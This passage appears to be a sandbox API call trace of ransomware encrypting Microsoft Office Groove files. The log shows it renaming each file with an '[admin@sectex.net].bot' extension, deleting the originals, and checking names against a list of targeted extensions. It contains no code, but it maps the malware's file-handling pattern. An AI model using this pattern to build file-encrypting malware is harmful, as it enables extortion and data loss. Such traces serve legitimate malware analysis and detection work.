	[0169.076] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=318) returned 1
	[0169.076] CloseHandle (hObject=0x3ac) returned 1
	[0169.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico")) returned 0x20
	[0169.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0169.091] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.092] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0169.874] GetLastError () returned 0x0
	[0169.874] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x13e, lpOverlapped=0x0) returned 1
	[0169.875] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x140, lpOverlapped=0x0) returned 1
	[0169.876] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.876] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0169.876] SetEndOfFile (hFile=0x3a4) returned 1
	[0169.877] CloseHandle (hObject=0x3a4) returned 1
	[0169.877] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.877] SetEndOfFile (hFile=0x3e8) returned 1
	[0169.879] CloseHandle (hObject=0x3e8) returned 1
	[0169.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.879] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico")) returned 1
	[0169.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.880] lstrlenW (lpString=".doc") returned 4
	[0169.880] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0169.880] lstrlenW (lpString=".docx") returned 5
	[0169.880] lstrcmpiW (lpString1=".docx", lpString2="M.ICO") returned -1
	[0169.880] lstrlenW (lpString=".pdf") returned 4
	[0169.880] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0169.880] lstrlenW (lpString=".xls") returned 4
	[0169.880] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0169.880] lstrlenW (lpString=".xlsx") returned 5
	[0169.880] lstrcmpiW (lpString1=".xlsx", lpString2="M.ICO") returned -1
	[0169.880] lstrlenW (lpString=".ppt") returned 4
	[0169.880] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0169.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.880] lstrlenW (lpString=".zip") returned 4
	[0169.881] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0169.881] lstrlenW (lpString=".rar") returned 4
	[0169.881] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0169.881] lstrlenW (lpString=".bz2") returned 4
	[0169.881] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0169.881] lstrlenW (lpString=".7z") returned 3
	[0169.881] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0169.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.881] lstrlenW (lpString=".dbf") returned 4
	[0169.881] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0169.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.881] lstrlenW (lpString=".1cd") returned 4
	[0169.881] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0169.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.881] lstrlenW (lpString=".jpg") returned 4
	[0169.881] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0169.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.881] lstrlenW (lpString=".doc") returned 4
	[0169.881] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0169.881] lstrlenW (lpString=".docx") returned 5
	[0169.881] lstrcmpiW (lpString1=".docx", lpString2="M.ICO") returned -1
	[0169.881] lstrlenW (lpString=".pdf") returned 4
	[0169.881] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0169.881] lstrlenW (lpString=".xls") returned 4
	[0169.881] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0169.881] lstrlenW (lpString=".xlsx") returned 5
	[0169.881] lstrcmpiW (lpString1=".xlsx", lpString2="M.ICO") returned -1
	[0169.881] lstrlenW (lpString=".ppt") returned 4
	[0169.881] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0169.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.881] lstrlenW (lpString=".zip") returned 4
	[0169.881] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0169.882] lstrlenW (lpString=".rar") returned 4
	[0169.882] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0169.882] lstrlenW (lpString=".bz2") returned 4
	[0169.882] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0169.882] lstrlenW (lpString=".7z") returned 3
	[0169.882] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0169.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.882] lstrlenW (lpString=".dbf") returned 4
	[0169.882] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0169.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.882] lstrlenW (lpString=".1cd") returned 4
	[0169.882] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0169.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 90
	[0169.882] lstrlenW (lpString=".jpg") returned 4
	[0169.882] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0169.882] lstrcmpiW (lpString1=".fdt", lpString2=".bot") returned 1
	[0169.882] lstrlenW (lpString="Customer Support.fdt") returned 20
	[0169.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\customer support.fdt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0169.885] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=131614) returned 1
	[0169.885] CloseHandle (hObject=0x3e8) returned 1
	[0169.885] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\customer support.fdt")) returned 0x20
	[0169.885] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\customer support.fdt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\customer support.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0169.885] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.885] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\customer support.fdt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0169.887] GetLastError () returned 0x0
	[0169.887] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x2021e, lpOverlapped=0x0) returned 1
	[0169.918] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x20220, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x20220, lpOverlapped=0x0) returned 1
	[0169.921] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.921] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0169.921] SetEndOfFile (hFile=0x3a4) returned 1
	[0169.921] CloseHandle (hObject=0x3a4) returned 1
	[0169.921] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.921] SetEndOfFile (hFile=0x3e8) returned 1
	[0169.962] CloseHandle (hObject=0x3e8) returned 1
	[0169.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.962] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\customer support.fdt")) returned 1
	[0169.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.963] lstrlenW (lpString=".doc") returned 4
	[0169.963] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0169.963] lstrlenW (lpString=".docx") returned 5
	[0169.963] lstrcmpiW (lpString1=".docx", lpString2="t.fdt") returned -1
	[0169.963] lstrlenW (lpString=".pdf") returned 4
	[0169.963] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0169.963] lstrlenW (lpString=".xls") returned 4
	[0169.963] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0169.963] lstrlenW (lpString=".xlsx") returned 5
	[0169.963] lstrcmpiW (lpString1=".xlsx", lpString2="t.fdt") returned -1
	[0169.963] lstrlenW (lpString=".ppt") returned 4
	[0169.963] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0169.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.963] lstrlenW (lpString=".zip") returned 4
	[0169.964] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0169.964] lstrlenW (lpString=".rar") returned 4
	[0169.964] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0169.964] lstrlenW (lpString=".bz2") returned 4
	[0169.964] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0169.964] lstrlenW (lpString=".7z") returned 3
	[0169.964] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0169.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.964] lstrlenW (lpString=".dbf") returned 4
	[0169.964] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0169.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.964] lstrlenW (lpString=".1cd") returned 4
	[0169.964] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0169.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.964] lstrlenW (lpString=".jpg") returned 4
	[0169.964] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0169.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.964] lstrlenW (lpString=".doc") returned 4
	[0169.964] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0169.964] lstrlenW (lpString=".docx") returned 5
	[0169.964] lstrcmpiW (lpString1=".docx", lpString2="t.fdt") returned -1
	[0169.964] lstrlenW (lpString=".pdf") returned 4
	[0169.964] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0169.964] lstrlenW (lpString=".xls") returned 4
	[0169.964] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0169.964] lstrlenW (lpString=".xlsx") returned 5
	[0169.964] lstrcmpiW (lpString1=".xlsx", lpString2="t.fdt") returned -1
	[0169.964] lstrlenW (lpString=".ppt") returned 4
	[0169.964] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0169.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.964] lstrlenW (lpString=".zip") returned 4
	[0169.964] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0169.964] lstrlenW (lpString=".rar") returned 4
	[0169.965] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0169.965] lstrlenW (lpString=".bz2") returned 4
	[0169.965] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0169.965] lstrlenW (lpString=".7z") returned 3
	[0169.965] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0169.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.965] lstrlenW (lpString=".dbf") returned 4
	[0169.965] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0169.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.965] lstrlenW (lpString=".1cd") returned 4
	[0169.965] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0169.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt") returned 117
	[0169.965] lstrlenW (lpString=".jpg") returned 4
	[0169.965] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0169.965] lstrcmpiW (lpString1=".fdt", lpString2=".bot") returned 1
	[0169.965] lstrlenW (lpString="Status Report.fdt") returned 17
	[0169.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\status report.fdt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0169.978] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=102061) returned 1
	[0169.978] CloseHandle (hObject=0x3f0) returned 1
	[0169.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\status report.fdt")) returned 0x20
	[0169.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\status report.fdt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\status report.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0169.982] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.982] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\status report.fdt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.983] GetLastError () returned 0x0
	[0169.983] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x18ead, lpOverlapped=0x0) returned 1
	[0170.082] WriteFile (in: hFile=0x354, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x18eb0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x18eb0, lpOverlapped=0x0) returned 1
	[0170.084] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.084] WriteFile (in: hFile=0x354, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0170.084] SetEndOfFile (hFile=0x354) returned 1
	[0170.385] CloseHandle (hObject=0x354) returned 1
	[0170.385] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.385] SetEndOfFile (hFile=0x3e8) returned 1
	[0170.395] CloseHandle (hObject=0x3e8) returned 1
	[0170.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.396] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\status report.fdt")) returned 1
	[0170.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.397] lstrlenW (lpString=".doc") returned 4
	[0170.397] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0170.397] lstrlenW (lpString=".docx") returned 5
	[0170.397] lstrcmpiW (lpString1=".docx", lpString2="t.fdt") returned -1
	[0170.397] lstrlenW (lpString=".pdf") returned 4
	[0170.397] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0170.397] lstrlenW (lpString=".xls") returned 4
	[0170.397] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0170.397] lstrlenW (lpString=".xlsx") returned 5
	[0170.397] lstrcmpiW (lpString1=".xlsx", lpString2="t.fdt") returned -1
	[0170.397] lstrlenW (lpString=".ppt") returned 4
	[0170.397] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0170.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.397] lstrlenW (lpString=".zip") returned 4
	[0170.397] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0170.397] lstrlenW (lpString=".rar") returned 4
	[0170.397] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0170.397] lstrlenW (lpString=".bz2") returned 4
	[0170.397] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0170.397] lstrlenW (lpString=".7z") returned 3
	[0170.397] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0170.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.397] lstrlenW (lpString=".dbf") returned 4
	[0170.397] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0170.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.397] lstrlenW (lpString=".1cd") returned 4
	[0170.397] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0170.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.397] lstrlenW (lpString=".jpg") returned 4
	[0170.397] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0170.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.397] lstrlenW (lpString=".doc") returned 4
	[0170.397] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0170.398] lstrlenW (lpString=".docx") returned 5
	[0170.398] lstrcmpiW (lpString1=".docx", lpString2="t.fdt") returned -1
	[0170.398] lstrlenW (lpString=".pdf") returned 4
	[0170.398] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0170.398] lstrlenW (lpString=".xls") returned 4
